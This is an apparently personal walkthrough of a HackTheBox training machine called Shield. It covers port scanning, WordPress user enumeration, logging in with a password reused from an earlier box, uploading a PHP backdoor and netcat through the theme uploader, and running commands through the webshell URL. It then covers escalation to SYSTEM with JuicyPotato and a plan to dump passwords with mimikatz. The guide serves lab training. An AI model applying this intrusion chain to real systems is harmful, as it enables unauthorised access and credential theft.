As I mentioned before, the starting point machines are a series of 9 easily rated machines that should be rooted in sequence. So it means, if you need to go through this box, first of all you must have a complete Vaccine machine.
Enough talks, 🥱 Let’s Get It Started 🐱💻
Disclaimers: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedure to grab the flags! 🐱👤
00. Start Machine …
To start machine, just click "Join Machine".
Then you can see the IP address for that machine. Usually it is 10.10.10.29 🤠
Before going enumeration steps we can simply ping to the IP address and check our VPN connection and whether the machine is alive. Sometimes the machines might "Disable" ping requests from passing through the firewall. But in most cases ping will be a success! 🙂
-n : Never do DNS resolution
-vv : Extra verbosity
--open : Output only open ports
-p- : Full TCP ports range (65535)
-T4 : Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network
Here is the output 👇
┌──(root💀Hidd3nWiki)-[~/Documents/Shield]└─# nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.29Starting Nmap 7.91 ( https://nmap.org ) at2021-05-2009:11 EDTInitiating Ping Scan at09:11Scanning 10.10.10.29 [4 ports]Completed Ping Scan at09:11, 0.30s elapsed (1 total hosts)Initiating SYN Stealth Scan at09:11Scanning 10.10.10.29 [65535 ports]Discovered open port 3306/tcpon10.10.10.29Discovered open port 80/tcpon10.10.10.29SYN Stealth Scan Timing: About 6.12% done; ETC: 09:19 (0:07:56 remaining)SYN Stealth Scan Timing: About 14.99% done; ETC: 09:18 (0:05:46 remaining)SYN Stealth Scan Timing: About 24.54% done; ETC: 09:17 (0:04:40 remaining)SYN Stealth Scan Timing: About 32.52% done; ETC: 09:17 (0:04:11 remaining)SYN Stealth Scan Timing: About 39.61% done; ETC: 09:17 (0:03:50 remaining)SYN Stealth Scan Timing: About 53.18% done; ETC: 09:17 (0:02:39 remaining)SYN Stealth Scan Timing: About 70.11% done; ETC: 09:16 (0:01:30 remaining)Completed SYN Stealth Scan at09:15, 253.94s elapsed (65535 total ports)Nmap scan report for10.10.10.29Host is up, received echo-reply ttl 127 (0.22s latency).Scanned at2021-05-2009:11:32 EDT for 254sNot shown: 65533 filtered portsReason: 65533no-responsesSome closed ports may be reported as filtered due to--defeat-rst-ratelimitPORT STATESERVICE REASON80/tcpopenhttp syn-ack ttl 1273306/tcpopen mysql syn-ack ttl 127Readdata files from: /usr/bin/../share/nmapNmap done: 1 IP address (1 host up) scanned in254.38secondsRaw packets sent: 131239 (5.774MB) | Rcvd: 170 (7.464KB)
Really? There are only two ports open. 😑😑😶
01.2 Run Nmap Scripting Engine
To get the best result, We can run the Nmap Scripting Engine for all open ports. Now we know all of the open ports and therefore we can point out and run the script engine as fast as possible.
┌──(root💀Hidd3nWiki)-[~/Documents/Shield]└─# nmap -sV -sC -oN DetailPorts.nmap -p 80,330610.10.10.29Starting Nmap 7.91 ( https://nmap.org ) at2021-05-2009:27 EDTNmap scan report for10.10.10.29Host is up (0.23s latency).PORT STATESERVICEVERSION80/tcpopenhttp Microsoft IIS httpd 10.0| http-methods:|_ Potentially risky methods: TRACE|_http-server-header: Microsoft-IIS/10.0|_http-title: IIS WindowsServer3306/tcpopen mysql MySQL (unauthorized)Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in13.56seconds
There are 2 main ports. One is running webserver and other one is running MySQL server. 🤷♂️🤷♂️
01.3 Discover more on port 80
🕵️♀️ Now we have only two open ports, so I chose port 80 first. Now you have a pretty big idea about what we need to do with port 80 right? Let's open our web browser, type 10.10.10.29 and then hit enter.
What the hell! Feel like there are more steps, 😖 Now we need to find whether there are any other directories here?
Again it's time to start fuzzing. I have already told you how to use dirsearchtool in oopsie walkthrough. Now it's time to learn a new cool tool right. 😍😎 The tool is ffuf. A fast web fuzzer written in Go.
You can download and install this tool by reading this. It must be installed on your OS if you are willing to face OSCP. Because it helps a lot more than ordinary Wfuzztool.
So we have only one directory and it is wordpress. Let's jump to our web browser and navigate to the http://10.10.10.29/wordpress
Now you can see there is a wordpress site hosted on the server. So now, time to use wpscan tool. By using this tool we can do lots of things on Wordpress CMS like enumerating plugins, users, themes, backups and also we can use this tool to brute force wordpress passwords.
wpscan --url http://10.10.10.29/wordpress -e u
Here is the output. 👇👇
┌──(root💀Hidd3nWiki)-[~/Documents/Shield]└─# wpscan --url http://10.10.10.29/wordpress -e u_______________________________________________________________ __ _______ _____ \ \ // __ \ / ____| \ \ /\ //| |__) | (___ ___ __ _ _ __ ® \ \/ \// | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.14 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart_______________________________________________________________[+] URL: http://10.10.10.29/wordpress/ [10.10.10.29][+] Started: Thu May 20 10:33:23 2021 <snap> ............ </snap>[+] admin | Found By: Rss Generator (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://10.10.10.29/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection)[!] No WPScan API Token given, as a result vulnerability data has not been output.[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register[+] Finished: Thu May 20 10:33:31 2021[+] Requests Done: 13[+] Cached Requests: 42[+] Data Sent: 3.559 KB[+] Data Received: 9.893 KB[+] Memory used: 122.016 MB[+] Elapsed time: 00:00:08
So as you can see there is only one user called admin in this wordpress site. Let's brute force that user using rockyou password.
Password brute forcing is more time consuming here. Since these boxes are in sequence, we can check previous credentials. 🙄🙄 in vaccine walkthrough we had found some passwords, if you check one by one you will get the right one. here it is P@s5w0rd! So the credentials for wordpress login are
admin : P@s5w0rd!
And if you are not familiar with wordpress sites, /wp-admin is the login page for most of the wordpress sites and it is the default login path. bla bla bala...
Anyway go to your browser again and navigate tohttp://10.10.10.29/wordpress/wp-admin . Now you are end up at login page.
Now you can enter above credentials ☝☝ and click enter. You are successfully logging to the wordpress site as admin. 👑👑
02. Foothold
Now it's time to upload reverse shell. But keep in mind that you are on the Windows machine. So you must have windows php reverse shell to gain access. Let's upload a bind shell. You can download it from here. And also we need netcat binary file to get reverse shell. You can download it from here. 😊😊
By looking at the dashboard settings, it's obvious that we have an option to upload media, themes, pages, etc. I’ll start from the themes to see what we can do.
Then click Add New button.
Browse and upload both netcat binary and bind shell php script.
Click "Install Now" button to upload. When you upload the files, You might get an error like this. It's just ok to ignore this error. 😉😉
Then navigate tohttp://10.10.10.29/wordpress/wp-content/Uploads/simple-backdoor.php?cmd=dir
As you can see, now we have a simple bind shell. Let's gain reverse shell using this with the help of our netcat binary file. First, power up a netcat listener then navigate to following url. (Change the <YourIP> and <PORT> as yours). %20 is indicated as space in url encoding. 😋😋
Woooh!! We have the SeImpersonatePrivilegeenabled. 🤩🤩 You know what it means, it means we can run juicy potato to gain privilege. 🥔🥔Let's do it..
Juicy Potato is a variant of the exploit that allows service accounts on Windows to escalate to SYSTEM (highest privileges) by leveraging the BITS and the SeAssignPrimaryToken or SeImpersonate privilege in a MiTM attack.
Download the JuicyPotato binary file and rename it to another file name. Because sometimes windows defender will hate us. And we need to upload it to the box. To do so, power up python demon web server on your machine.
Change YourIP and YourPort as yours. After create the batch file, view that file using type command to verify.
Then all the things are fine. Now it's time to exploit. Let's power up netcat listener again and execute the following command. If you failed to get reverse shell; change the -c parameter (CLSID) from using this document and run again. 😎
Now we are at NT AUTHORITY\SYSTEM level. So let’s upload mimikatz and see what we can pull. Mimikatz can be used to dump cached passwords. Download mimikatz tool from here and upload it to the box.
